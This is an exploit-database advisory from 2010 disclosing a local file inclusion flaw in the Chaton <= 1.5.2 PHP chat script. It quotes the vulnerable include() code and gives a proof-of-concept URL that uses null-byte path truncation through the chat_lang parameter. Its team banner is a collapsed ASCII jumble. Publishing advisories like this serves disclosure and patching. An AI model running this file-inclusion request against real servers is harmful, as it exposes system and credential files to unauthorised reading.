Chaton <= 1.5.2 Local File Include Vulnerability

2010-03-11T00:00:00
ID SECURITYVULNS:DOC:23338
Type securityvulns
Reporter Securityvulns
Modified 2010-03-11T00:00:00

Description

================================================ Chaton <= 1.5.2 Local File Include Vulnerability ================================================

[+] Chaton <= 1.5.2 Local File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'_\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \\\ \__\\ \____/\ \\ 0 0 \//\//\//\ \\ \// \// \/__/ \/___/ \// 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm cr4wl3r member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r [+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip [+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

if &#40;file_exists&#40; &quot;lang/$chat_lang/deplacer.php&quot;&#41;&#41; {
    include&#40; &quot;lang/$chat_lang/deplacer.php&quot;&#41;;
}

if &#40;$chat_salon != $newsalon&#41; {
    if &#40;$chat_hide == false&#41; {
        // Salle publique = Recupere le vrai nom
        $nomsalle = NomSalonPublic&#40; $newsalon&#41;;
        if &#40;$nomsalle == &#39;&#39;&#41; {
            // Salon privИ
            $salon_prive = true;
            $nomsalle = $newsalon;
        } else {
            $salon_prive = false;
        }

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]

~ - [ [ : Inj3ct0r : ] ]